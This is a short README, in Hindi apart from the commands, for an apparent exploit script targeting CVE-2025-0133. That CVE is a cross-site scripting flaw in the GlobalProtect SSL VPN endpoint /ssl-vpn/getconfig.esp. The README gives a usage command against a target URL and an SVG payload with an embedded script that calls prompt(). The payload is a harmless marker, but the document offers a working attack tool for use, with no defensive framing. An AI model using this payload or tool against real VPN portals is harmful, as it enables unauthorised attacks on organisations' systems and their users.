
CVE-2025-0133 GlobalProtect XSS
🔓 GlobalProtect SSL VPN एंडपॉइंट /ssl-vpn/getconfig.esp के लिए शोषण जो URL में एक निर्मित XSS पेलोड जोड़ता है।
python3 exploit.py -u https://target.com
-u, --url: आधार लक्ष्य URL (क्वेरी पैरामीटर शामिल न करें)<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>